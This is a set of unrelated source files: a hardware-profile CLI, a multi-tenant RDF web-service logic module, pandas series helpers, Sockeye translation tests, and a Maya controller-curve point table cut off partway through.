        :raises InvalidCliRequest: if the template path does not exist
        :raises InvalidProfileCreationTemplate: if the template is unreadable
        """
        self.parseArgs()

        # The positional NAME and the deprecated --name are mutually exclusive
        if self.getArgs().name and self.getArgs().deprecated_name:
            self.getParser().error(
                'argument name: not allowed with argument --name'
            )

        name = self.getArgs().name or self.getArgs().deprecated_name

        if self.getArgs().jsonTemplatePath:
            # load from template
            tmpl_dict = self._load_template(self.getArgs().jsonTemplatePath)
        else:
            # build up dict from scratch
            tmpl_dict = {}

        # Command-line options override/augment the template contents
        if name:
            tmpl_dict['name'] = name

        if self.getArgs().description:
            tmpl_dict['description'] = self.getArgs().description

        # 'osInfo' is set by ParseOperatingSystemArgAction when --os is given
        if hasattr(self.getArgs(), 'osInfo'):
            os_info = getattr(self.getArgs(), 'osInfo')
            tmpl_dict['os'] = {
                'name': os_info.getName(),
                'version': os_info.getVersion(),
                'arch': os_info.getArch(),
            }

        if self.getArgs().nameFormat:
            tmpl_dict['nameFormat'] = self.getArgs().nameFormat
        elif 'nameFormat' not in tmpl_dict:
            # fall back to the conventional compute host name format
            tmpl_dict['nameFormat'] = 'compute-#NN'

        if self.getArgs().tags:
            tmpl_dict['tags'] = parse_tags(self.getArgs().tags)

        settings_dict = {
            'defaults': self.getArgs().bUseDefaults,
            'osInfo': getattr(self.getArgs(), 'osInfo', None),
        }

        hw_profile_spec = HardwareProfile.getFromDict(tmpl_dict)

        api = self.configureClient(HardwareProfileWsApi)
        api.createHardwareProfile(hw_profile_spec, settings_dict)

    def _load_template(self, template_path: str) -> dict:
        """
        Load the 'hardwareProfile' dict from a JSON template file.

        :raises InvalidCliRequest: if the file does not exist
        :raises InvalidProfileCreationTemplate: on parse/format errors
        """
        if not os.path.exists(template_path):
            raise InvalidCliRequest(
                _('Cannot read template from %s') % (template_path))

        try:
            with open(template_path) as fp:
                buf = json.load(fp)
            return buf['hardwareProfile']
        except Exception as exc:
            raise InvalidProfileCreationTemplate(
                'Invalid profile creation template: {}'.format(exc))
def main():
    """Entry point: instantiate the CLI command and run it."""
    cli = CreateHardwareProfileCli()
    cli.run()
|
from storage import operation_primitives
import example_logic_tier as base
import rdf_json
from rdf_json import URI
import logging
import utils
import os, urlparse
from base_constants import CE, AC, RDF, AC_ALL, LDP, ADMIN_USER
from base_constants import URL_POLICY as url_policy
# Module-wide debug logging for this example tier
logging.basicConfig(level=logging.DEBUG)
# Flags passed to create_container(); presumably they select whether a member
# appears as the object or the subject of the membership triple — TODO confirm
# against base.Domain_Logic.create_container.
MEMBER_IS_OBJECT = True
MEMBER_IS_SUBJECT = False
class Domain_Logic(base.Domain_Logic):
    '''
    Multi-tenant specialization of the example Domain_Logic.

    The special tenant 'hostingsite' owns the 'mt' namespace collections
    ('sites', 'capabilities'); other tenants are individual sites whose
    requests are mostly delegated to the base class.
    '''
    def default_resource_group(self):
        # A site document is its own access-control resource group
        if self.namespace == 'mt' and self.document_id == 'sites':
            return self.document_url()
        return super(Domain_Logic, self).default_resource_group()
    def create_document(self, document):
        '''
        Route POSTs: site creation, capability creation, or property
        sub-resources; anything else is a 404. Requires an authenticated user.
        '''
        if self.user is None:
            return (401, [], None)
        else:
            if self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'sites':
                return self.create_site(document)
            elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'capabilities':
                rdf_doc = rdf_json.RDF_JSON_Document(document, '')
                # only documents typed as CE Capability are accepted here;
                # any other type falls through to the 404 below
                if str(rdf_doc.get_value(RDF+'type')) == CE+'Capability':
                    return self.create_capability(document)
            elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id != 'none' and self.extra_path_segments and self.extra_path_segments[0] == 'properties':
                return super(Domain_Logic, self).create_document(document)
        return(404, [], [('', 'unknown collection %s' % self.path)])
    def put_document(self, document):
        # PUT is intentionally unsupported in this tier
        return(404, [], [('', 'PUT not supported')])
    def execute_query(self, query):
        # No custom queries are defined for this tier
        return(400, [], [('', 'unknown query %s' % self.path)])
    def get_document(self):
        '''
        Serve the hostingsite home page, a tenant home page (redirect), or the
        virtual 'sites'/'capabilities' containers; otherwise delegate to base.
        '''
        if self.tenant == 'hostingsite' and self.path == '/' : #home page
            resource_url = url_policy.construct_url(self.request_hostname, self.tenant)
            rdf_json_doc = rdf_json.RDF_JSON_Document({
                resource_url: {
                    RDF+'type': URI(CE+'Saas_host'),
                    #CE+'sites': URI(url_policy.construct_url(None, 'hostingsite', 'mt', 'sites'))
                    CE+'sites': URI(url_policy.construct_url(None, None, 'mt', 'sites'))
                    }
                }, resource_url)
            return (200, [], rdf_json_doc)
        elif self.path == '/': # home page for a particular tenant
            if self.user is None:
                return (401, [], None)
            else:
                # the tenant's site document lives in the hostingsite's 'mt' collection
                status, document = operation_primitives.get_document(self.user, self.request_hostname, 'hostingsite', 'mt', self.tenant)
                if status == 200:
                    site_home = document.get_value(CE+'site_home').uri_string
                    return [301, [('Location', str(site_home))], None]
                return [status, [], document]
        elif self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id == 'sites': #bpc container of all sites visible to the user
            if self.user is None and self.extra_path_segments and len(self.extra_path_segments) == 1 and self.extra_path_segments[0] == 'new':
                return (401, [], None)
            member_resource = url_policy.construct_url(self.request_hostname)
            container_url = url_policy.construct_url(self.request_hostname, self.tenant, 'mt', 'sites')
            document = self.create_container(container_url, member_resource, CE+'sites', MEMBER_IS_OBJECT)
            status, document = self.complete_request_document(document)
            return (status, [], document)
        elif self.namespace == 'mt' and self.document_id == 'capabilities': #bpc container of all capabilities visible to the user
            member_resource = url_policy.construct_url(self.request_hostname)
            container_url = url_policy.construct_url(self.request_hostname, self.tenant, 'mt', 'capabilities')
            document = self.create_container(container_url, member_resource, CE+'capabilities', MEMBER_IS_OBJECT)
            status, document = self.complete_request_document(document)
            return (status, [], document)
        return super(Domain_Logic, self).get_document()
    def add_bpc_member_properties(self, container, query=None):
        if str(container.get_value(LDP+'membershipResource')) == url_policy.construct_url(self.request_hostname) and str(container.get_value(LDP+'hasMemberRelation')) == CE+'capabilities':
            try:
                #tricky code - change tenant to cause the query to look for data in the hostingsite's collections, not the requestor's (tenant's)
                #since all stored data is relative to an implicit host (domain), this will find the same data for each tenant domain.
                #Each resource that is found will be returned in the tenants domain, so capabilities are automatically mirrored in all tenant domains
                #although they are only really stored in the hostingsite domain's collections
                original_tenant = self.tenant
                self.tenant = 'hostingsite'
                result = super(Domain_Logic, self).add_bpc_member_properties(container, query)
            finally:
                # always restore the requestor's tenant, even on failure
                self.tenant = original_tenant
            return result
        else:
            return super(Domain_Logic, self).add_bpc_member_properties(container, query)
    def complete_result_document(self, document):
        # in this section we add any calculated triples
        document_url = document.graph_url
        types = document.get_values(RDF+'type')
        if URI(CE+'Site') in types:
            improvements = document.get_values(CE+'improvements')
            tenant_id = self.document_id
            tenant_base_url = url_policy.construct_url(self.request_hostname, tenant_id)
            if len(improvements) > 0: # turn these relative URLs to absolute
                abs_improvement_urls = [urlparse.urljoin(tenant_base_url, rel_improvement_url) for rel_improvement_url in improvements]
                document.set_value(CE+'improvements', abs_improvement_urls)
            document.add_triples(document_url, CE+'site_capabilities', url_policy.construct_url(self.request_hostname, tenant_id, 'mt', 'capabilities'))
        return super(Domain_Logic, self).complete_result_document(document)
    def patch_document(self, request_body):
        # PATCH only supported for hostingsite-owned 'mt' documents
        if self.tenant == 'hostingsite' and self.namespace == 'mt' and self.document_id != None:
            return super(Domain_Logic, self).patch_document(request_body)
        else:
            return (400, [], [('','Patch Not yet implemented')])
    def preprocess_properties_for_storage_insertion(self, rdf_json):
        # NOTE: the 'rdf_json' parameter shadows the module-level rdf_json import
        def make_relative(improvement_url):
            # strip scheme and host so stored URLs are host-relative
            abs_url_str = urlparse.urljoin(self.request_url(), str(improvement_url))
            parsed_url = []
            parsed_url.extend(urlparse.urlparse(abs_url_str))
            parsed_url[0] = ''
            parsed_url[1] = ''
            return urlparse.urlunparse(parsed_url)
        improvements = rdf_json.get_values(CE+'improvements')
        if len(improvements) > 0: # turn these absolute URLs to relative
            rdf_json.set_value(CE+'improvements', [make_relative(improvement_url) for improvement_url in improvements])
    def create_site(self, document):
        '''
        Validate and create a new site document, then create a UserGroup that
        grants the creating user full permissions for the new site.
        Returns (201, ...) on success, (400, [], field_errors) on failure.
        '''
        if self.user is None:
            return (401, [], None)
        field_errors = []
        site = rdf_json.RDF_JSON_Document(document, '')
        site_types = site.get_values(RDF+'type')
        if URI(CE+'Site') not in site_types:
            field_errors.append(['', 'site must have a type of CE Site'])
        site_id = site.get_value(CE+'site_id')
        if not (site_id):
            field_errors.append(['', 'must set CE+"site_id" for site'])
        else:
            if not site_id.isalpha():
                field_errors.append(['', 'site id must be alphanumeric'])
            else:
                if not site_id.islower():
                    field_errors.append(['', 'site id must be lowercase'])
        if len(field_errors) == 0:
            # check as ADMIN_USER so existence is detected regardless of the
            # requestor's read permissions
            status, body = operation_primitives.get_document(ADMIN_USER, self.request_hostname, 'hostingsite', 'mt', site_id)
            if status == 200 or site_id == 'sites': #oops - site already exists
                field_errors.append([CE+'id', 'site already exists'])
            else:
                site.set_value(AC+'resource-group', URI('')) #group for a site is itself
                status, headers, body = super(Domain_Logic, self).create_document(site, site_id)
                if status == 201:
                    # create a UserGroup that gives the current user AC_ALL permissions for the new site
                    data = {
                        '' : {
                            RDF+'type': URI(AC+'UserGroup'),
                            AC+'who' : [ URI(self.user) ],
                            AC+'may' : [ URI('#permission_1') ]
                            },
                        '#permission_1' : {
                            AC+'do' : AC_ALL,
                            AC+'to' : [ URI('/') ]
                            }
                        }
                    ac_url = url_policy.construct_url(self.request_hostname, site_id, 'ac')
                    r = utils.intra_system_post(ac_url, data)
                    if r.status_code == 201:
                        return (201, headers, body)
                    field_errors.append(['', "failed to create UserGroup: %s %s" % (str(r.status_code), r.text)])
                else:
                    field_errors.append(['', "unexpected error creating site: %s %s" % (str(status), str(body))])
        return (400, [], field_errors)
    def create_capability(self, document):
        '''
        Validate and create a new capability document.
        Returns (201, ...) on success, (400, [], field_errors) on failure.
        '''
        if self.user is None:
            return (401, [], None)
        field_errors = []
        capability = rdf_json.RDF_JSON_Document(document, '')
        types = capability.get_values(RDF+'type')
        if URI(CE+'Capability') not in types:
            field_errors.append(['', 'capability must have a type of CE Capability'])
        container = capability.get_value(CE+'improvement_container')
        if not container:
            field_errors.append([CE+'improvement_container', 'must be set'])
        improvement_type = capability.get_value(CE+'improvement_type')
        if not improvement_type:
            field_errors.append([CE+'improvement_type', 'must be set'])
        if len(field_errors) == 0:
            status_code, headers, json_document = super(Domain_Logic, self).create_document(document)
            if status_code == 201:
                return (201, headers, json_document)
            else:
                field_errors.append(['', "unexpected error creating capability: %s %s" % (str(status_code), str(json_document))])
        return (400, [], field_errors)
|
from data_processing import _in_list
import pandas as pd, numpy as np
def stacked_series_flatten(ser):
    '''
    flatten a series containing 1-D list-like items

    Scalars are kept as-is; list items are flattened column-wise (all first
    elements, then all second elements, ...) and missing positions dropped.

    Parameters
    ----------
    ser : Series

    Returns
    -------
    sser : Series
        series with all list items flattened to scalars

    Example
    -------
    >>> import pandas as pd
    >>> ser = pd.Series([[1,2,3],[4,5,6],[7,8,9]], name='array')
    >>> stacked_series_flatten(ser)
    0    1
    1    4
    2    7
    3    2
    4    5
    5    8
    6    3
    7    6
    8    9
    Name: array, dtype: int64
    '''
    # normalize item datatypes first (helper defined elsewhere in this module)
    ser = ser.map(transfer_datatype)
    sser = ser[ser.map(type) != list]
    lser = ser[ser.map(type) == list]
    if lser.empty:
        # nothing to flatten; return the scalar items unchanged
        return sser
    maxn = int(lser.map(len).max())
    # append the i-th element of every list, column by column; lists shorter
    # than i contribute None, which is dropped at the end.
    # pd.concat replaces the Series.append call removed in pandas 2.0.
    for i in range(maxn):
        column = lser.map(lambda x: x[i] if len(x) > i else None)
        sser = pd.concat([sser, column], ignore_index=True)
    return sser.dropna()
def stacked_series_map(ser,mapfunc='count',label=None,ascending=False):
    '''
    map every item in a 1-D stacked series
    Parameters
    ----------
    ser : Series or DataFrame
    mapfunc : str or function, default 'count'
        - 'count' : count every element in series
        - 'sum' : sum index of every element in series
        - function
    label : str, default None
        ignored if type of ser is Series.
        Do stacked_series_map on DataFrame's label column
    ascending : bool, default False
    See Also
    --------
    stacked_series_flatten
    Examples
    --------
    >>> t = pd.Series([1,[4,5,6],[6,5],[3,6],[]],name='array')
    >>> t
    0            1
    1    [4, 5, 6]
    2       [6, 5]
    3       [3, 6]
    4           []
    Name: array, dtype: object
    >>> stacked_series_map(t)
         count
    array
    6.0      3
    5.0      2
    1.0      1
    3.0      1
    4.0      1
    >>> stacked_series_map(t,'sum')
         sum
    array
    6.0   18
    5.0   11
    3.0    3
    4.0    1
    1.0    0
    mapfunc can also be a function applying to a Groupby object.
    >>> stacked_series_map(t,lambda x: x.max())
         result
    array
    6.0     9.0
    5.0     6.0
    3.0     3.0
    4.0     1.0
    1.0     0.0
    '''
    # NOTE(review): mutates the caller's series name as a side effect
    ser.name = ser.name if ser.name else 'ser'
    # NOTE(review): rename_axis with a dict + axis=1 relies on legacy pandas
    # (<0.24) behavior where rename_axis acted like rename on column labels;
    # on modern pandas this raises/behaves differently — verify pandas version.
    df = stacked_series_flatten(ser).reset_index().rename_axis({'index':'result'}, axis=1)
    if type(mapfunc) == str:
        if mapfunc not in ['count','sum']: raise ValueError('mapfunc param not supported, please input count or sum')
        elif mapfunc == 'sum':
            # 'sum' aggregates the original index positions per value
            dfp = df.groupby(ser.name).sum().rename_axis({'result':'sum'},axis=1).sort_values('sum',ascending=ascending)
        elif mapfunc == 'count':
            dfp = df.groupby(ser.name).count().rename_axis({'result':'count'},axis=1).sort_values('count',ascending=ascending)
    else:
        # custom aggregation applied to each group; drop the duplicated key column
        dfp = df.groupby(ser.name).apply(mapfunc).sort_values('result',ascending=ascending)
        del dfp[ser.name]
    if type(label) == type(None): return dfp
    else:
        # optional relabeling of the result index via dict/Series/2-col DataFrame
        if type(label) in [dict,pd.Series]: return dfp.rename_axis(label)
        elif type(label) == pd.DataFrame:
            if label.shape[1]!=2:
                raise ValueError('Length of DataFrame columns must be 2; %i detected'%label.shape[1])
            return dfp.rename_axis(dict(label.values))
def df_filter(df, column, condition, how='find', include=True):
    '''
    find all records satisfying given condition

    Parameters
    ----------
    df : DataFrame
    column : str or iterable of str
        column name(s) to match against; with multiple columns and
        include=True the per-column results are unioned, with include=False
        the exclusions are applied successively
    condition : iterable or scalar
        list of filter rules; a falsy condition returns df unchanged
    how : str
        - 'find' : call x.find(rule)
        - 're' : call re.find(rule,x)
        - 'fullmatch' : x == rule
    include : bool
        True if you want to include all found data in df
        False if you want to exclude all found data in df

    Returns
    -------
    DataFrame
        a filtered result; the caller's df is never modified (the previous
        implementation dropped NaN rows from it in place)
    '''
    if not condition: return df
    if isinstance(column, str):
        # normalize a scalar rule to a one-element list
        condition = [condition] if type(condition) in (str,int,float) else list(condition)
        # work on a copy: do NOT mutate the caller's DataFrame
        df = df.dropna(subset=[column])
        matches = df[column].map(lambda x: bool(_in_list(x, condition, how=how)))
        return df[matches] if include else df[~matches]
    else:
        if include:
            # union of per-column matches, de-duplicated
            dfs = pd.concat([df_filter(df, c, condition, how, include) for c in column],
                            ignore_index=True)
            return dfs.drop_duplicates()
        else:
            # successively exclude matches for each column
            dfs = df.copy()
            for c in column:
                dfs = df_filter(dfs, c, condition, how, include)
            return dfs.drop_duplicates()
|
# Copyright 2017--2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
import os
import sys
from tempfile import TemporaryDirectory
from typing import List
from unittest.mock import patch
import pytest
import torch as pt
import sockeye.average
import sockeye.checkpoint_decoder
import sockeye.evaluate
from sockeye import constants as C
from sockeye.config import Config
from sockeye.model import load_model
from sockeye.test_utils import run_train_translate, tmp_digits_dataset
from test.common import check_train_translate
logger = logging.getLogger(__name__)

# Dimensions of the synthetic digit-copy corpora generated for these tests.
_TRAIN_LINE_COUNT = 20        # non-empty training sentence pairs
_TRAIN_LINE_COUNT_EMPTY = 1   # additional empty training lines
_DEV_LINE_COUNT = 5           # development sentence pairs
_TEST_LINE_COUNT = 5          # non-empty test sentence pairs
_TEST_LINE_COUNT_EMPTY = 2    # additional empty test lines
_LINE_MAX_LENGTH = 9          # max tokens per train/dev sentence
_TEST_MAX_LENGTH = 20         # max tokens per test sentence
# tuple format: (train_params, translate_params, use_prepared_data, use_source_factors)
# NOTE(review): the comment above looks stale — each entry actually ends with
# TWO ints, (n_source_factors, n_target_factors); cf. the parametrize
# signature of test_seq_copy below.
ENCODER_DECODER_SETTINGS_TEMPLATE = [
    # Basic transformer, nbest=2 decoding, no learning rate scheduler
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     # Note: We set the checkpoint interval > max updates in order to make sure we create a checkpoint when reaching
     # max updates independent of the checkpoint interval
     " --checkpoint-interval 20 --optimizer adam --initial-learning-rate 0.01 --learning-rate-scheduler none",
     "--beam-size 2 --nbest-size 2",
     False, 0, 0),
    # Basic transformer w/ prepared data & greedy decoding
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01",
     "--beam-size 1 --greedy",
     True, 0, 0),
    # Basic transformer with source and target factors, beam-search-stop first decoding
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
     " --source-factors-combine sum concat average --source-factors-share-embedding true false true"
     " --source-factors-num-embed 8 2 8"
     " --target-factors-combine sum --target-factors-share-embedding false"
     " --target-factors-num-embed 8",
     "--beam-size 2 --beam-search-stop first",
     True, 3, 1),
    # Basic transformer with LHUC DISABLE FOR MX2 FOR NOW (UNKNOWN FAILURE)
    # NOTE(review): this entry hard-codes "--decoder transformer" instead of
    # the {decoder} placeholder, so it is NOT expanded across C.DECODERS.
    ("--encoder transformer --decoder transformer"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01 --lhuc all",
     "--beam-size 2",
     False, 0, 0),
    # Basic transformer and length ratio prediction, and learned brevity penalty during inference
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
     " --length-task ratio --length-task-weight 1.0 --length-task-layers 1",
     "--beam-size 2"
     " --brevity-penalty-type learned --brevity-penalty-weight 1.0",
     True, 0, 0),
    # Basic transformer and absolute length prediction, and constant brevity penalty during inference
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
     " --length-task length --length-task-weight 1.0 --length-task-layers 1",
     "--beam-size 2"
     " --brevity-penalty-type constant --brevity-penalty-weight 2.0 --brevity-penalty-constant-length-ratio 1.5",
     False, 0, 0),
    # Basic transformer, training only the decoder
    ("--encoder transformer --decoder {decoder}"
     " --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 8 --num-embed 8"
     " --transformer-feed-forward-num-hidden 16"
     " --transformer-dropout-prepost 0.1 --transformer-preprocess n --transformer-postprocess dr"
     " --weight-tying-type src_trg_softmax"
     " --batch-size 2 --max-updates 2 --batch-type sentence --decode-and-evaluate 0"
     " --checkpoint-interval 2 --optimizer adam --initial-learning-rate 0.01"
     " --fixed-param-strategy " + C.FIXED_PARAM_STRATEGY_ALL_EXCEPT_DECODER,
     "--beam-size 2",
     False, 0, 0),
]
# expand test cases across transformer & ssru, as well as use_pytorch true/false
# NOTE(review): the "use_pytorch true/false" part of the comment above appears
# stale — expansion below is only over C.DECODERS via the {decoder} placeholder.
TEST_CASES = [(train_params.format(decoder=decoder), *other_params)
              for decoder in C.DECODERS
              for (train_params, *other_params) in ENCODER_DECODER_SETTINGS_TEMPLATE]
@pytest.mark.parametrize("train_params, translate_params, use_prepared_data,"
                         "n_source_factors, n_target_factors", TEST_CASES)
def test_seq_copy(train_params: str,
                  translate_params: str,
                  use_prepared_data: bool,
                  n_source_factors: int,
                  n_target_factors: int):
    """
    Task: copy short sequences of digits
    """
    # Collect the dataset parameters once, then run the train/translate cycle
    # inside the temporary-dataset context.
    dataset_kwargs = dict(prefix="test_seq_copy",
                          train_line_count=_TRAIN_LINE_COUNT,
                          train_line_count_empty=_TRAIN_LINE_COUNT_EMPTY,
                          train_max_length=_LINE_MAX_LENGTH,
                          dev_line_count=_DEV_LINE_COUNT,
                          dev_max_length=_LINE_MAX_LENGTH,
                          test_line_count=_TEST_LINE_COUNT,
                          test_line_count_empty=_TEST_LINE_COUNT_EMPTY,
                          test_max_length=_TEST_MAX_LENGTH,
                          sort_target=False,
                          with_n_source_factors=n_source_factors,
                          with_n_target_factors=n_target_factors)
    with tmp_digits_dataset(**dataset_kwargs) as data:
        # TODO: Here we temporarily switch off comparing translation and scoring scores, which
        # sometimes produces inconsistent results for --batch-size > 1 (see issue #639 on github).
        check_train_translate(train_params=train_params,
                              translate_params=translate_params,
                              data=data,
                              use_prepared_data=use_prepared_data,
                              max_seq_len=_LINE_MAX_LENGTH,
                              compare_output=False)
# Minimal (train_params, translate_params) pair used by test_other_clis:
# a tiny transformer trained for 4 updates and decoded with beam size 1.
TINY_TEST_MODEL = [(" --num-layers 2 --transformer-attention-heads 2 --transformer-model-size 4 --num-embed 4"
                    " --transformer-feed-forward-num-hidden 4 --weight-tying-type src_trg_softmax"
                    " --batch-size 2 --batch-type sentence --max-updates 4 --decode-and-evaluate 0"
                    " --checkpoint-interval 4",
                    "--beam-size 1")]
@pytest.mark.parametrize("train_params, translate_params", TINY_TEST_MODEL)
def test_other_clis(train_params: str, translate_params: str):
    """
    Task: test CLIs and core features other than train & translate.
    """
    dataset_kwargs = dict(prefix="test_other_clis",
                          train_line_count=_TRAIN_LINE_COUNT,
                          train_line_count_empty=_TRAIN_LINE_COUNT_EMPTY,
                          train_max_length=_LINE_MAX_LENGTH,
                          dev_line_count=_DEV_LINE_COUNT,
                          dev_max_length=_LINE_MAX_LENGTH,
                          test_line_count=_TEST_LINE_COUNT,
                          test_line_count_empty=0,
                          test_max_length=_TEST_MAX_LENGTH)
    with tmp_digits_dataset(**dataset_kwargs) as data:
        # Train a minimal default model, then exercise the auxiliary CLIs
        # (checkpoint decoding, parameter averaging, evaluation) on it.
        data = run_train_translate(train_params=train_params,
                                   translate_params=translate_params,
                                   data=data,
                                   max_seq_len=_LINE_MAX_LENGTH)
        _test_checkpoint_decoder(data['dev_source'], data['dev_target'], data['model'])
        _test_parameter_averaging(data['model'])
        _test_evaluate_cli(data['test_outputs'], data['test_target'])
def _test_evaluate_cli(test_outputs: List[str], test_target_path: str):
    """
    Runs sockeye-evaluate CLI with translations and a reference file.
    """
    with TemporaryDirectory(prefix="test_evaluate") as work_dir:
        # Dump the hypotheses to a temporary file, one translation per line.
        out_path = os.path.join(work_dir, 'hypotheses')
        with open(out_path, 'w') as fd:
            fd.writelines(output['translation'] + '\n' for output in test_outputs)
        # Invoke the evaluate CLI through a patched sys.argv.
        eval_params = "{} --hypotheses {hypotheses} --references {references} --metrics {metrics}".format(
            sockeye.evaluate.__file__,
            hypotheses=out_path,
            references=test_target_path,
            metrics="bleu chrf rouge1 ter")
        with patch.object(sys, "argv", eval_params.split()):
            sockeye.evaluate.main()
def _test_parameter_averaging(model_path: str):
    """
    Runs parameter averaging with all available strategies
    """
    for avg_strategy in C.AVERAGE_CHOICES:
        checkpoints = sockeye.average.find_checkpoints(model_path=model_path,
                                                       size=4,
                                                       strategy=avg_strategy,
                                                       metric=C.PERPLEXITY)
        # Every strategy must select at least one checkpoint and produce
        # a non-empty set of averaged parameters.
        assert len(checkpoints) > 0
        averaged = sockeye.average.average(checkpoints)
        assert averaged
def _test_checkpoint_decoder(dev_source_path: str, dev_target_path: str, model_path: str):
    """
    Runs checkpoint decoder on 10% of the dev data and checks whether metric keys are present in the result dict.

    :param dev_source_path: Path to the dev source sentences (one per line).
    :param dev_target_path: Path to the dev reference sentences.
    :param model_path: Folder of the trained model to decode with.
    """
    with open(dev_source_path) as dev_fd:
        num_dev_sent = sum(1 for _ in dev_fd)
    # Use 10% of the dev data, but always decode at least one sentence.
    # BUGFIX: the original used min(1, ...), which yields a sample size of 0
    # for any dev set smaller than 10 sentences — contradicting the documented
    # 10% sampling (behavior of sample_size=0 then depends on CheckpointDecoder).
    sample_size = max(1, int(num_dev_sent * 0.1))
    model, source_vocabs, target_vocabs = load_model(model_folder=model_path, device=pt.device('cpu'))
    cp_decoder = sockeye.checkpoint_decoder.CheckpointDecoder(device=pt.device('cpu'),
                                                              inputs=[dev_source_path],
                                                              references=[dev_target_path],
                                                              source_vocabs=source_vocabs,
                                                              target_vocabs=target_vocabs,
                                                              model=model,
                                                              model_folder=model_path,
                                                              sample_size=sample_size,
                                                              batch_size=2,
                                                              beam_size=2)
    cp_metrics = cp_decoder.decode_and_evaluate()
    logger.info("Checkpoint decoder metrics: %s", cp_metrics)
    # The decoder must report at least these metric keys.
    assert 'bleu' in cp_metrics
    assert 'chrf' in cp_metrics
    assert 'decode-walltime' in cp_metrics
|
<filename>programs/maya/scripts/data/curve.py<gh_stars>0
import maya.cmds as cmds
# Mapping of controller-curve name -> list of CV positions (x, y, z) used when
# building NURBS controller curves.
# NOTE(review): several 'box' tuples carry a trailing comma inside the
# parentheses, e.g. (0.5, 0.5, -0.5,) — harmless, but inconsistent.
CURVE_POINTS = {
    'square': [(-1, 0, -1), (1, 0, -1), (1, 0, 1), (-1, 0, 1)],
    'triangle': [(-1, 0, 1), (0, 0, -1), (1, 0, 1)],
    'box': [
        (0.5, 0.5, 0.5), (-0.5, 0.5, 0.5), (-0.5, 0.5, -0.5), (0.5, 0.5, -0.5,), (0.5, 0.5, 0.5,),
        (0.5, -0.5, 0.5,), (0.5, -0.5, -0.5,), (0.5, 0.5, -0.5,), (-0.5, 0.5, -0.5,),
        (-0.5, -0.5, -0.5,), (-0.5, -0.5, 0.5,), (-0.5, 0.5, 0.5,), (-0.5, -0.5, 0.5,),
        (0.5, -0.5, 0.5,), (0.5, -0.5, -0.5,), (-0.5, -0.5, -0.5,)],
    'pyramid': [
        (0, -0.353553, -0.707107), (-0.707107, -0.353553, 0), (0, 0.353553, 0),
        (0, -0.353553, -0.707107), (0.707107, -0.353553, 0), (0, 0.353553, 0),
        (0, -0.353553, 0.707107), (0.707107, -0.353553, 0), (0, -0.353553, 0.707107),
        (-0.707107, -0.353553, 0)],
    'diamond': [
        (0, 1, 0), (1, 0, 0), (0, 0, 1), (0, 1, 0), (0, 0, -1), (-1, 0, 0), (0, 1, 0), (0, 0, 1),
        (-1, 0, 0), (0, -1, 0), (0, 0, 1), (1, 0, 0), (0, -1, 0), (0, 0, -1), (1, 0, 0)],
    'quad_arrow': [
        (0.4, 0.0, -0.4), (0.4, 0.0, -0.6), (0.4, 0.0, -0.8), (0.4, 0.0, -1.0), (0.4, 0.0, -1.2),
        (0.8, 0.0, -1.2), (0.6, 0.0, -1.4), (0.4, 0.0, -1.6), (0.2, 0.0, -1.8), (0.0, 0.0, -2.0),
        (-0.2, 0.0, -1.8), (-0.4, 0.0, -1.6), (-0.6, 0.0, -1.4), (-0.8, 0.0, -1.2),
        (-0.4, 0.0, -1.2), (-0.4, 0.0, -1.0), (-0.4, 0.0, -0.8), (-0.4, 0.0, -0.6),
        (-0.4, 0.0, -0.4), (-0.6, 0.0, -0.4), (-0.8, 0.0, -0.4), (-1.0, 0.0, -0.4),
